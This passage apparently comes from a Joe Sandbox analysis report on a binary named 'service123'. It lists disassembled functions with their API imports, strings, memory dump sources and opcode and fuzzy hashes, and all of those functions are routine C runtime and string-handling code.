String ID: __deregister_frame_info$__register_frame_info$libgcc_s_dw2-1.dll
API String ID: 384173800-1835852900
Opcode ID: 72d16842ddeaf4e6f4967f04b23074b1772f6371d2c6948ff4385a3c43740187
Instruction ID: 348e7e1dc0e22f36d7ca9198e3bc53fce00822d68c7ccae360385db5de33760f
Opcode Fuzzy Hash: 72d16842ddeaf4e6f4967f04b23074b1772f6371d2c6948ff4385a3c43740187
Instruction Fuzzy Hash: E60144B19097809FC3007FBAAA8921EBFF4EF45750F45493DE5899B201E7759884CBA3

Function 6C7613E0 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 43libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32 ref: 6C7613F0
LoadLibraryA.KERNEL32 ref: 6C761406
GetProcAddress.KERNEL32 ref: 6C761425
GetProcAddress.KERNEL32 ref: 6C761437

Strings

__register_frame_info, xrefs: 6C76141A
__deregister_frame_info, xrefs: 6C76142C
libgcc_s_dw2-1.dll, xrefs: 6C7613E9, 6C7613FF

Memory Dump Source

Source File: 00000004.00000002.3472672650.000000006C761000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000004.00000002.3472649354.000000006C760000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3472802130.000000006C83D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3472818152.000000006C83F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473026407.000000006C888000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473051311.000000006C889000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473074482.000000006C88C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c760000_service123.jbxd

Similarity

API ID: AddressProc$HandleLibraryLoadModule
String ID: __deregister_frame_info$__register_frame_info$libgcc_s_dw2-1.dll
API String ID: 384173800-1835852900
Opcode ID: 09f44d8c5b04b4787a31e51603734b129d33ad246ab9b276d55145330a1712fb
Instruction ID: b83475ed15513e4a031dfd75fd422bda8675a7d3b3d230deedf5329bcefe6ad8
Opcode Fuzzy Hash: 09f44d8c5b04b4787a31e51603734b129d33ad246ab9b276d55145330a1712fb
Instruction Fuzzy Hash: B50171B2906214DBC720BFBE970A21D7FB4AA42354F41587DD99987E10D730C418CBE3

Function 6C787170 Relevance: 12.2, APIs: 6, Strings: 2, Instructions: 237stringCOMMON

Download Yara Rule

APIs

strcmp.MSVCRT ref: 6C7871C1
strlen.MSVCRT ref: 6C7871DB
strlen.MSVCRT ref: 6C78722B
strlen.MSVCRT ref: 6C787288
strlen.MSVCRT ref: 6C7872DC

Strings

*, xrefs: 6C787410
basic_string::append, xrefs: 6C78747A, 6C787486, 6C787492, 6C78749E

Memory Dump Source

Source File: 00000004.00000002.3472672650.000000006C761000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000004.00000002.3472649354.000000006C760000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3472802130.000000006C83D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3472818152.000000006C83F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473026407.000000006C888000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473051311.000000006C889000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473074482.000000006C88C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c760000_service123.jbxd

Similarity

API ID: strlen$strcmp
String ID: *$basic_string::append
API String ID: 551667898-3732199748
Opcode ID: 6cdaee1fe497a70575906fcc329a1b68ba56cc45b07cde265fd6ecf7f9e7a739
Instruction ID: d68a437599100c721f8f3f4a6159dcca1002c72f3996614a33c8f066beb16e67
Opcode Fuzzy Hash: 6cdaee1fe497a70575906fcc329a1b68ba56cc45b07cde265fd6ecf7f9e7a739
Instruction Fuzzy Hash: D9A16D70A057108FCB10EF68C28475EBBF1BB85308F51897CE8999BB45DB35E849CB92

Function 6C803B80 Relevance: 12.2, APIs: 7, Strings: 1, Instructions: 233COMMON

Download Yara Rule

APIs

memmove.MSVCRT ref: 6C803C1F
memmove.MSVCRT(?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,?,6C79E77E), ref: 6C803C83
memmove.MSVCRT ref: 6C803CBB
memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,?,6C79E77E), ref: 6C803D2A

Strings

basic_string::_M_replace, xrefs: 6C803EAF

Memory Dump Source

Source File: 00000004.00000002.3472672650.000000006C761000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000004.00000002.3472649354.000000006C760000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3472802130.000000006C83D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3472818152.000000006C83F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473026407.000000006C888000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473051311.000000006C889000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473074482.000000006C88C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c760000_service123.jbxd

Similarity

API ID: memmove$memcpy
String ID: basic_string::_M_replace
API String ID: 3033661859-2323331477
Opcode ID: c510fcb4e7c9224350e0ebbf9c4da0a1b73e7e70f657b7958a8fef1810c6d649
Instruction ID: f42da1ede5475013c9623d225d52da0781b85df836953f60873bf58370451ecf
Opcode Fuzzy Hash: c510fcb4e7c9224350e0ebbf9c4da0a1b73e7e70f657b7958a8fef1810c6d649
Instruction Fuzzy Hash: 4F9115356493558FC720DF18C68085ABBE1BF89748F558D2DE889DB720D770ED85CB82

Function 6C76E800 Relevance: 12.1, APIs: 8, Instructions: 89COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3472672650.000000006C761000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000004.00000002.3472649354.000000006C760000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3472802130.000000006C83D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3472818152.000000006C83F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473026407.000000006C888000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473051311.000000006C889000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473074482.000000006C88C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c760000_service123.jbxd

Similarity

API ID: strlen
String ID:
API String ID: 39653677-0
Opcode ID: 1884a794d3d441725b09e7e72905d71cc32fb0140713b8c23ce069bb11cd822c
Instruction ID: 36732d5c1f23c23296ef8f0c395145a0c759511b1a4b884d0c054c4bd23570d6
Opcode Fuzzy Hash: 1884a794d3d441725b09e7e72905d71cc32fb0140713b8c23ce069bb11cd822c
Instruction Fuzzy Hash: 0A21983195460ECF9710CA1FCA8558AB7A6AB96314B54A935DC8447F19E320E88B87F2

Function 001E1E70 Relevance: 12.1, APIs: 8, Instructions: 84COMMON

Download Yara Rule

APIs

signal.MSVCRT ref: 001E1EAF
signal.MSVCRT ref: 001E1EF6
signal.MSVCRT ref: 001E1F0F
signal.MSVCRT ref: 001E1F36
signal.MSVCRT ref: 001E1F72
signal.MSVCRT ref: 001E1FBF
signal.MSVCRT ref: 001E1FD5
signal.MSVCRT ref: 001E1FEB

Memory Dump Source

Source File: 00000004.00000002.3472271261.00000000001E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000004.00000002.3472247083.00000000001E0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.3472294710.00000000001EA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.3472312596.00000000001EE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.3472341172.00000000001F1000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1e0000_service123.jbxd

Similarity

API ID: signal
String ID:
API String ID: 1946981877-0
Opcode ID: 5903cfedec0176d9daf2d8989ff1d063baba2b3788087a7e36c33a1c25c48564
Instruction ID: 24e5e3625904d1e67d495f309809e96e1b0797abbc28f77f9463916143baaf99
Opcode Fuzzy Hash: 5903cfedec0176d9daf2d8989ff1d063baba2b3788087a7e36c33a1c25c48564
Instruction Fuzzy Hash: A0311EB1508B80AAE724AFA6C94432EB6D4BF55358F154D0DF8C987281CB7DC8CC9B93

Function 001E4360 Relevance: 10.9, APIs: 3, Strings: 3, Instructions: 399COMMON

Download Yara Rule

APIs

_errno.MSVCRT ref: 001E4378

Strings

@, xrefs: 001E4647
Inf, xrefs: 001E4E35, 001E4E4D
NaN, xrefs: 001E4D3B

Memory Dump Source

Source File: 00000004.00000002.3472271261.00000000001E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000004.00000002.3472247083.00000000001E0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.3472294710.00000000001EA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.3472312596.00000000001EE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.3472341172.00000000001F1000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1e0000_service123.jbxd

Similarity

API ID: _errno
String ID: @$Inf$NaN
API String ID: 2918714741-141429178
Opcode ID: 6630ae7dabcc08bee8f952b85f5cef022e77c9ebc7d6241e4f615562ddc2b2aa
Instruction ID: b3839d497123d6423f26f2f179a3e153e4ec460a49fdcfdfe5af3b9d6152f184
Opcode Fuzzy Hash: 6630ae7dabcc08bee8f952b85f5cef022e77c9ebc7d6241e4f615562ddc2b2aa
Instruction Fuzzy Hash: D7F1BE7560CBC18BD7308F26C4903AFBBE1BF85314F258A6DE9DD87285D73599068B82

Function 6C774A30 Relevance: 10.9, APIs: 3, Strings: 3, Instructions: 399COMMON

Download Yara Rule

APIs

_errno.MSVCRT ref: 6C774A48

Strings

Inf, xrefs: 6C775505, 6C77551D
@, xrefs: 6C774D17
NaN, xrefs: 6C77540B

Memory Dump Source

Source File: 00000004.00000002.3472672650.000000006C761000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000004.00000002.3472649354.000000006C760000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3472802130.000000006C83D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3472818152.000000006C83F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473026407.000000006C888000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473051311.000000006C889000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473074482.000000006C88C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c760000_service123.jbxd

Similarity

API ID: _errno
String ID: @$Inf$NaN
API String ID: 2918714741-141429178
Opcode ID: 12ce98a2da18920b542051123c05180db865e3640121083a215a5f8419b3b0a2
Instruction ID: 3dfd9d47a02f7266bbf6100e3932d158b457c0dd57d67401ed16914eac749906
Opcode Fuzzy Hash: 12ce98a2da18920b542051123c05180db865e3640121083a215a5f8419b3b0a2
Instruction Fuzzy Hash: 17F1E17160C3898BDB708F24D64439BBBE2BB85318F158A2DE8DC87791D7349909DF92

Function 001E3160 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 295COMMON

Download Yara Rule

Strings

@, xrefs: 001E342A
0, xrefs: 001E34C6

Memory Dump Source

Source File: 00000004.00000002.3472271261.00000000001E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000004.00000002.3472247083.00000000001E0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.3472294710.00000000001EA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.3472312596.00000000001EE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.3472341172.00000000001F1000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1e0000_service123.jbxd

Similarity

API ID:
String ID: 0$@
API String ID: 0-1545510068
Opcode ID: e57f9d77be607eb7be2d65c7f691f863806e0b74bc638be5844c6890f5152d77
Instruction ID: 808f1e3b486fc2e90cd7641625158d127b58c2dce2097573deed92e5108be801
Opcode Fuzzy Hash: e57f9d77be607eb7be2d65c7f691f863806e0b74bc638be5844c6890f5152d77
Instruction Fuzzy Hash: 38C16071E00A558BCB15CF6EC48879DBBF1BF88314F198259E864AB385D734ED41CB90

Function 6C773830 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 295COMMON

Download Yara Rule

Strings

@, xrefs: 6C773AFA
0, xrefs: 6C773B96

Memory Dump Source

Source File: 00000004.00000002.3472672650.000000006C761000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000004.00000002.3472649354.000000006C760000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3472802130.000000006C83D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3472818152.000000006C83F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473026407.000000006C888000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473051311.000000006C889000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473074482.000000006C88C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c760000_service123.jbxd

Similarity

API ID:
String ID: 0$@
API String ID: 0-1545510068
Opcode ID: 852fd2e7f322feda59a9287ec6fcafc659018383277beee50283a5623e34e20d
Instruction ID: 97164b55f7156f487a5169f2a080cb83284a439150a3ae86e34a54ca9f63e5e8
Opcode Fuzzy Hash: 852fd2e7f322feda59a9287ec6fcafc659018383277beee50283a5623e34e20d
Instruction Fuzzy Hash: BDC18F71E042198BDF14CF6DCA8478DBBF1BF89318F158269E858AB795D334E845CBA0

Function 6C78B5C0 Relevance: 10.7, APIs: 5, Strings: 2, Instructions: 212stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 6C78B5E6
memcmp.MSVCRT ref: 6C78B60A
memcmp.MSVCRT ref: 6C78B67D
memcmp.MSVCRT ref: 6C78B6EF

Part of subcall function 6C82AB60: strlen.MSVCRT ref: 6C82AB6E

memcmp.MSVCRT ref: 6C78B787

Strings

%s: __pos (which is %zu) > this->size() (which is %zu), xrefs: 6C78B631, 6C78B6A2, 6C78B715, 6C78B7AE, 6C78B7CA
basic_string::compare, xrefs: 6C78B629, 6C78B69A, 6C78B70D, 6C78B7A6, 6C78B7C2

Memory Dump Source

Source File: 00000004.00000002.3472672650.000000006C761000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000004.00000002.3472649354.000000006C760000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3472802130.000000006C83D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3472818152.000000006C83F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473026407.000000006C888000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473051311.000000006C889000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473074482.000000006C88C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c760000_service123.jbxd

Similarity

API ID: memcmp$strlen
String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::compare
API String ID: 3738950036-1697194757
Opcode ID: 7edc2391fc457967a3b23252fc4fdd004f1560d51a5c0d4d6976c2173beb23cb
Instruction ID: e8db009d41514bac6da4e0859a88acb2a48b2b3023157bff99bd4ff53193dbbf
Opcode Fuzzy Hash: 7edc2391fc457967a3b23252fc4fdd004f1560d51a5c0d4d6976c2173beb23cb
Instruction Fuzzy Hash: 8861567160A3159FC700DF29CA8484ABBE5BF98644F55893DE9C887715E331E844CB92

Function 6C7874C0 Relevance: 10.7, APIs: 6, Strings: 1, Instructions: 211stringCOMMON

Download Yara Rule

APIs

Part of subcall function 6C7D30D0: memset.MSVCRT ref: 6C7D3115

strcmp.MSVCRT ref: 6C787521
strlen.MSVCRT ref: 6C78753C
strlen.MSVCRT ref: 6C787583
strlen.MSVCRT ref: 6C7875F4
strlen.MSVCRT ref: 6C787662

Strings

*, xrefs: 6C787740

Memory Dump Source

Source File: 00000004.00000002.3472672650.000000006C761000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000004.00000002.3472649354.000000006C760000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3472802130.000000006C83D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3472818152.000000006C83F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473026407.000000006C888000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473051311.000000006C889000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473074482.000000006C88C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c760000_service123.jbxd

Similarity

API ID: strlen$memsetstrcmp
String ID: *
API String ID: 3639840916-163128923
Opcode ID: 836728d441bd60f7db32f277bab6ea01f36ac17fdc9639de9ba13841a01bf7c1
Instruction ID: d76d05c408205bf050dd67b42444536c3548b67aa26f13e5ab84412ea6b53b06
Opcode Fuzzy Hash: 836728d441bd60f7db32f277bab6ea01f36ac17fdc9639de9ba13841a01bf7c1
Instruction Fuzzy Hash: 1A8143B5B06A008FDB00EF29C68865AFBF5FF85308F0185BDE9559B754D731A809CB92

Function 6C76E8E0 Relevance: 10.7, APIs: 7, Instructions: 183COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3472672650.000000006C761000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000004.00000002.3472649354.000000006C760000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3472802130.000000006C83D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3472818152.000000006C83F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473026407.000000006C888000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473051311.000000006C889000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473074482.000000006C88C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c760000_service123.jbxd

Similarity

API ID: strlen
String ID:
API String ID: 39653677-0
Opcode ID: 6949fccd0a9c3e9d3ac8c5b45f2aac2a255c09ca815fc16772279bff97c29dd2
Instruction ID: 157907fd127166392f30f0e77dba24745dfb89e6b80b78eb52ccb4763d396168
Opcode Fuzzy Hash: 6949fccd0a9c3e9d3ac8c5b45f2aac2a255c09ca815fc16772279bff97c29dd2
Instruction Fuzzy Hash: 1251607150970C8FC710CF1ACA80666BBE0BF89308F444A6AECD99BE55E734D945CBE6

Function 6C76E340 Relevance: 10.6, APIs: 7, Instructions: 126synchronizationCOMMON

Download Yara Rule

APIs

CreateSemaphoreW.KERNEL32 ref: 6C76E487
WaitForSingleObject.KERNEL32 ref: 6C76E4C8

Memory Dump Source

Source File: 00000004.00000002.3472672650.000000006C761000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000004.00000002.3472649354.000000006C760000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3472802130.000000006C83D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3472818152.000000006C83F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473026407.000000006C888000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473051311.000000006C889000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473074482.000000006C88C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c760000_service123.jbxd

Similarity

API ID: CreateObjectSemaphoreSingleWait
String ID:
API String ID: 1168595426-0
Opcode ID: 7ef84ef0cdff974206045336f1ca31bcf61c1c6d019f7ddef4378a822f1fbbe3
Instruction ID: da7913601ae4ab1e369081cef33e295abe2632740f12198ea6608c67393ea18e
Opcode Fuzzy Hash: 7ef84ef0cdff974206045336f1ca31bcf61c1c6d019f7ddef4378a822f1fbbe3
Instruction Fuzzy Hash: 5351F470706205CBDB20DF7ACA846167BF5AB4670CF154939EC688BE81E734D845CBE2

Function 6C7701F0 Relevance: 10.6, APIs: 7, Instructions: 65COMMON

Download Yara Rule

APIs

malloc.MSVCRT ref: 6C770209
memcpy.MSVCRT(?,?,00000000,00000000,?,7622E010,6C77038F), ref: 6C77022D
malloc.MSVCRT ref: 6C770247
memset.MSVCRT ref: 6C770275
abort.MSVCRT(?,?,00000000,00000000,?,7622E010,6C77038F), ref: 6C836D74
abort.MSVCRT(?,?,00000000,00000000,?,7622E010,6C77038F), ref: 6C836D79
abort.MSVCRT(?,?,00000000,00000000,?,7622E010,6C77038F), ref: 6C836D7E

Memory Dump Source

Source File: 00000004.00000002.3472672650.000000006C761000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000004.00000002.3472649354.000000006C760000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3472802130.000000006C83D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3472818152.000000006C83F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473026407.000000006C888000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473051311.000000006C889000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473074482.000000006C88C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c760000_service123.jbxd

Similarity

API ID: abort$malloc$memcpymemset
String ID:
API String ID: 334492700-0
Opcode ID: e6d7780d917140ca2a5588e03258049156473324d9afcb76f04c1c6ed51653e4
Instruction ID: c365a59a86d00bafc9ae535177b55a6ecd20a4322cdc7c1301d845db7b4035b7
Opcode Fuzzy Hash: e6d7780d917140ca2a5588e03258049156473324d9afcb76f04c1c6ed51653e4
Instruction Fuzzy Hash: 56118FB26062089FDF10AFA9D688899B7F4FB44258F02893ED848C7B00E731D508C671

Function 001E8120 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 001E812C
GetProcAddress.KERNEL32 ref: 001E814C
GetProcAddress.KERNEL32 ref: 001E818B

Strings

__lc_codepage, xrefs: 001E8180
msvcrt.dll, xrefs: 001E8125
___lc_codepage_func, xrefs: 001E8144

Memory Dump Source

Source File: 00000004.00000002.3472271261.00000000001E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000004.00000002.3472247083.00000000001E0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.3472294710.00000000001EA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.3472312596.00000000001EE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.3472341172.00000000001F1000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1e0000_service123.jbxd

Similarity

API ID: AddressProc$HandleModule
String ID: ___lc_codepage_func$__lc_codepage$msvcrt.dll
API String ID: 667068680-1145701848
Opcode ID: 3766b075a9475862b5e753e787aede873e4df0ed396f1851d4b861a7ca6c323f
Instruction ID: 73b993a1844688d8dc7719ba72857c3f915b45a9408fb3c1f3207b2ca8df7aef
Opcode Fuzzy Hash: 3766b075a9475862b5e753e787aede873e4df0ed396f1851d4b861a7ca6c323f
Instruction Fuzzy Hash: DCF096B08446908F9700BF7A6E4524F7EF4AB04310F45453DD889DB240EB75D485CBA3

Function 6C779171 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 35libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 6C77917C
GetProcAddress.KERNEL32 ref: 6C77919C
GetProcAddress.KERNEL32 ref: 6C7791DB

Strings

msvcrt.dll, xrefs: 6C779175
__lc_codepage, xrefs: 6C7791D0
___lc_codepage_func, xrefs: 6C779194

Memory Dump Source

Source File: 00000004.00000002.3472672650.000000006C761000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000004.00000002.3472649354.000000006C760000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3472802130.000000006C83D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3472818152.000000006C83F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473026407.000000006C888000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473051311.000000006C889000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473074482.000000006C88C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c760000_service123.jbxd

Similarity

API ID: AddressProc$HandleModule
String ID: ___lc_codepage_func$__lc_codepage$msvcrt.dll
API String ID: 667068680-1145701848
Opcode ID: 6f26c2e161f57dc4a7d2a50e8b0f7635b32673f146f2e7bc4508e3c4bdda62ed
Instruction ID: 740d5abacff3dc3e79586185a95553f19cea46d820569bf54c4a9641c36bdcb3
Opcode Fuzzy Hash: 6f26c2e161f57dc4a7d2a50e8b0f7635b32673f146f2e7bc4508e3c4bdda62ed
Instruction Fuzzy Hash: AAF062B1A462098BEF307F7C5B0A24A7FF0A656264F40493EC889C7A10E230D424C7F2

Function 6C76EA9B Relevance: 10.5, APIs: 7, Instructions: 21COMMON

Download Yara Rule

APIs

abort.MSVCRT(?,?,?,?,?,?,6C76E2F4,?,?,?,?,?,?,00000000,00000001,6C77008D), ref: 6C836D60
abort.MSVCRT(?,?,?,?,?,?,6C76E2F4,?,?,?,?,?,?,00000000,00000001,6C77008D), ref: 6C836D65
abort.MSVCRT(?,?,?,?,?,?,6C76E2F4,?,?,?,?,?,?,00000000,00000001,6C77008D), ref: 6C836D6A
abort.MSVCRT(?,?,?,?,?,?,6C76E2F4,?,?,?,?,?,?,00000000,00000001,6C77008D), ref: 6C836D6F
abort.MSVCRT(?,?,00000000,00000000,?,7622E010,6C77038F), ref: 6C836D74
abort.MSVCRT(?,?,00000000,00000000,?,7622E010,6C77038F), ref: 6C836D79
abort.MSVCRT(?,?,00000000,00000000,?,7622E010,6C77038F), ref: 6C836D7E

Memory Dump Source

Source File: 00000004.00000002.3472672650.000000006C761000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000004.00000002.3472649354.000000006C760000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3472802130.000000006C83D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3472818152.000000006C83F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473026407.000000006C888000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473051311.000000006C889000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473074482.000000006C88C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c760000_service123.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: 1e0c335cc361dda1bc33d437742637b5b623609a86091116d78be9412fd93d2e
Instruction ID: fcb2d93e8f074bba676298ead667a78535f7deb43430287f15d275d328364ab5
Opcode Fuzzy Hash: 1e0c335cc361dda1bc33d437742637b5b623609a86091116d78be9412fd93d2e
Instruction Fuzzy Hash: 72B01231CCB23CCB4C3155BE8B1C0906229B627345345BC53CC4FE3D048B12E00780B2

Function 6C804890 Relevance: 10.2, APIs: 8, Instructions: 158COMMON

Download Yara Rule

APIs

memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,6C80B65E), ref: 6C804913
memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,6C80B65E), ref: 6C804955

Memory Dump Source

